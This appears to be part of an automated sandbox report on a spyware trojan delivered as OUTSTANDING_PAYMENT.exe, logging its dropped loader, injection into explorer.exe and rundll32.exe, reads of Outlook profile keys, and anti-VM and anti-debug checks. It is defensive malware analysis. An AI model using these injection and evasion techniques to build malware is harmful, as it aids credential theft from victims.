          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9710 NtQueryInformationToken,LdrInitializeThunk,2_2_012D9710
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D97A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_012D97A0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9780 NtMapViewOfSection,LdrInitializeThunk,2_2_012D9780
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9FE0 NtCreateMutant,LdrInitializeThunk,2_2_012D9FE0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_012D9660
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D96E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_012D96E0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9950 NtQueueApcThread,2_2_012D9950
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D99D0 NtCreateProcessEx,2_2_012D99D0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9820 NtEnumerateKey,2_2_012D9820
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012DB040 NtSuspendThread,2_2_012DB040
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D98A0 NtWriteVirtualMemory,2_2_012D98A0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9B00 NtSetValueKey,2_2_012D9B00
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012DA3B0 NtGetContextThread,2_2_012DA3B0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9A10 NtQuerySection,2_2_012D9A10
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9A80 NtOpenDirectoryObject,2_2_012D9A80
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9520 NtWaitForSingleObject,2_2_012D9520
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012DAD30 NtSetContextThread,2_2_012DAD30
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9560 NtWriteFile,2_2_012D9560
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D95F0 NtQueryInformationFile,2_2_012D95F0
          Source: OUTSTANDING_PAYMENT.exeReversingLabs: Detection: 71%
          Source: OUTSTANDING_PAYMENT.exeVirustotal: Detection: 72%
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeFile read: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeJump to behavior
          Source: OUTSTANDING_PAYMENT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exe
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeProcess created: C:\Users\user\AppData\Local\Temp\qhcqh.exe "C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeProcess created: C:\Users\user\AppData\Local\Temp\qhcqh.exe C:\Users\user\AppData\Local\Temp\qhcqh.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeProcess created: C:\Users\user\AppData\Local\Temp\qhcqh.exe "C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.zJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeProcess created: C:\Users\user\AppData\Local\Temp\qhcqh.exe C:\Users\user\AppData\Local\Temp\qhcqh.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exeJump to behavior
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lockJump to behavior
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeFile created: C:\Users\user\AppData\Local\Temp\nsmF14E.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@26/12
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AB5
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: OUTSTANDING_PAYMENT.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: qhcqh.exe, 00000001.00000003.259638663.000000001A710000.00000004.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000001.00000003.253388114.000000001A580000.00000004.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000002.00000002.303852536.000000000138F000.00000040.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000002.00000003.261286551.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.303638444.00000000048DD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.779153808.0000000004D2F000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.305325246.0000000004A74000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.779153808.0000000004C10000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: qhcqh.exe, qhcqh.exe, 00000002.00000002.303852536.000000000138F000.00000040.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000002.00000002.303852536.0000000001270000.00000040.00001000.00020000.00000000.sdmp, qhcqh.exe, 00000002.00000003.261286551.00000000010D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.303638444.00000000048DD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.779153808.0000000004D2F000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.305325246.0000000004A74000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.779153808.0000000004C10000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: qhcqh.exe, 00000002.00000002.303774098.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: qhcqh.exe, 00000002.00000002.303774098.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_00C52DA9 push ecx; ret 1_2_00C52DBC
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_027F44E2 push E4DD4FA3h; retf 1_2_027F44FE
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_027F49A2 pushfd ; iretd 1_2_027F49AB
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00406066 push edi; retf 2_2_00406067
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00409120 push ss; ret 2_2_00409127
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0041B2DF push ecx; ret 2_2_0041B2F4
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00421286 push ebp; ret 2_2_0042128C
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0040F3BA pushad ; retf 2_2_0040F3BB
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00401DE0 push eax; ret 2_2_00401DE2
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_004105B5 push ebx; ret 2_2_00410602
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00401635 push eax; ret 2_2_00401641
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0041B682 push ds; retf 2_2_0041B683
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00410E9F push cs; ret 2_2_00410EA6
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00408F17 push ebp; ret 2_2_00408F37
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0040F726 push ds; ret 2_2_0040F73C
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00C52DA9 push ecx; ret 2_2_00C52DBC
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012ED0D1 push ecx; ret 2_2_012ED0E4
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_00C56A26 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,1_2_00C56A26
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeFile created: C:\Users\user\AppData\Local\Temp\qhcqh.exeJump to dropped file
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_1-7805
          Source: C:\Windows\explorer.exe TID: 1328Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 1280Thread sleep count: 60 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exe TID: 1280Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_1-5936
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01365BA5 rdtsc 2_2_01365BA5
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 885Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 870Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeAPI coverage: 5.8 %
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_027F30FA GetSystemInfo,1_2_027F30FA
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeAPI call chain: ExitProcess graph end nodegraph_0-3480
          Source: explorer.exe, 00000003.00000003.670764938.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
          Source: explorer.exe, 00000003.00000002.790142809.000000000F270000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWSt%SystemRoot%\system32\mswsock.dlls\StoreBadgeLogo.pngU
          Source: explorer.exe, 00000003.00000003.476355979.000000000F7D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000003.670095974.0000000007166000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000003.00000003.670764938.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000003.475538694.0000000009054000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
          Source: explorer.exe, 00000003.00000003.670764938.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
          Source: explorer.exe, 00000003.00000002.777751246.0000000001425000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @%SystemRoot%\System32\wshqos.dll,-103a0%SystemRoot%\system32\mswsock.dll-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
          Source: explorer.exe, 00000003.00000003.670660288.00000000050C2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
          Source: explorer.exe, 00000003.00000000.276570847.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.exe,-4000
          Source: explorer.exe, 00000003.00000003.475538694.0000000009054000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000003.00000000.266462070.0000000001425000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_00C564EA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00C564EA
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_00C56A26 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,1_2_00C56A26
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_00C5A330 CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,1_2_00C5A330
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01365BA5 rdtsc 2_2_01365BA5
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_027F2A5E mov eax, dword ptr fs:[00000030h]1_2_027F2A5E
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_027F2A29 mov eax, dword ptr fs:[00000030h]1_2_027F2A29
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_027F2A9B mov eax, dword ptr fs:[00000030h]1_2_027F2A9B
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_027F297F mov eax, dword ptr fs:[00000030h]1_2_027F297F
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012B4120 mov eax, dword ptr fs:[00000030h]2_2_012B4120
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012B4120 mov eax, dword ptr fs:[00000030h]2_2_012B4120
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012B4120 mov eax, dword ptr fs:[00000030h]2_2_012B4120
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012B4120 mov eax, dword ptr fs:[00000030h]2_2_012B4120
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012B4120 mov ecx, dword ptr fs:[00000030h]2_2_012B4120
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C513A mov eax, dword ptr fs:[00000030h]2_2_012C513A
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C513A mov eax, dword ptr fs:[00000030h]2_2_012C513A
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01299100 mov eax, dword ptr fs:[00000030h]2_2_01299100
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01299100 mov eax, dword ptr fs:[00000030h]2_2_01299100
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01299100 mov eax, dword ptr fs:[00000030h]2_2_01299100
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0129C962 mov eax, dword ptr fs:[00000030h]2_2_0129C962
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0129B171 mov eax, dword ptr fs:[00000030h]2_2_0129B171
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0129B171 mov eax, dword ptr fs:[00000030h]2_2_0129B171
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012BB944 mov eax, dword ptr fs:[00000030h]2_2_012BB944
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012BB944 mov eax, dword ptr fs:[00000030h]2_2_012BB944
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C61A0 mov eax, dword ptr fs:[00000030h]2_2_012C61A0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C61A0 mov eax, dword ptr fs:[00000030h]2_2_012C61A0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013151BE mov eax, dword ptr fs:[00000030h]2_2_013151BE
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013151BE mov eax, dword ptr fs:[00000030h]2_2_013151BE
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013151BE mov eax, dword ptr fs:[00000030h]2_2_013151BE
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013151BE mov eax, dword ptr fs:[00000030h]2_2_013151BE
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013549A4 mov eax, dword ptr fs:[00000030h]2_2_013549A4
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013549A4 mov eax, dword ptr fs:[00000030h]2_2_013549A4
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013549A4 mov eax, dword ptr fs:[00000030h]2_2_013549A4
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013549A4 mov eax, dword ptr fs:[00000030h]2_2_013549A4
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013169A6 mov eax, dword ptr fs:[00000030h]2_2_013169A6
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012BC182 mov eax, dword ptr fs:[00000030h]2_2_012BC182
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CA185 mov eax, dword ptr fs:[00000030h]2_2_012CA185
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C2990 mov eax, dword ptr fs:[00000030h]2_2_012C2990
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0129B1E1 mov eax, dword ptr fs:[00000030h]2_2_0129B1E1
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0129B1E1 mov eax, dword ptr fs:[00000030h]2_2_0129B1E1
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0129B1E1 mov eax, dword ptr fs:[00000030h]2_2_0129B1E1
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013241E8 mov eax, dword ptr fs:[00000030h]2_2_013241E8
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012AB02A mov eax, dword ptr fs:[00000030h]2_2_012AB02A
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012AB02A mov eax, dword ptr fs:[00000030h]2_2_012AB02A
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012AB02A mov eax, dword ptr fs:[00000030h]2_2_012AB02A
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012AB02A mov eax, dword ptr fs:[00000030h]2_2_012AB02A
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C002D mov eax, dword ptr fs:[00000030h]2_2_012C002D
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C002D mov eax, dword ptr fs:[00000030h]2_2_012C002D
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C002D mov eax, dword ptr fs:[00000030h]2_2_012C002D
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C002D mov eax, dword ptr fs:[00000030h]2_2_012C002D
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C002D mov eax, dword ptr fs:[00000030h]2_2_012C002D
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01364015 mov eax, dword ptr fs:[00000030h]2_2_01364015
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01364015 mov eax, dword ptr fs:[00000030h]2_2_01364015
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01317016 mov eax, dword ptr fs:[00000030h]2_2_01317016
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01317016 mov eax, dword ptr fs:[00000030h]2_2_01317016
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01317016 mov eax, dword ptr fs:[00000030h]2_2_01317016
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01361074 mov eax, dword ptr fs:[00000030h]2_2_01361074
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01352073 mov eax, dword ptr fs:[00000030h]2_2_01352073
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012B0050 mov eax, dword ptr fs:[00000030h]2_2_012B0050
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012B0050 mov eax, dword ptr fs:[00000030h]2_2_012B0050
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D90AF mov eax, dword ptr fs:[00000030h]2_2_012D90AF
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C20A0 mov eax, dword ptr fs:[00000030h]2_2_012C20A0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C20A0 mov eax, dword ptr fs:[00000030h]2_2_012C20A0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C20A0 mov eax, dword ptr fs:[00000030h]2_2_012C20A0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C20A0 mov eax, dword ptr fs:[00000030h]2_2_012C20A0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C20A0 mov eax, dword ptr fs:[00000030h]2_2_012C20A0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C20A0 mov eax, dword ptr fs:[00000030h]2_2_012C20A0
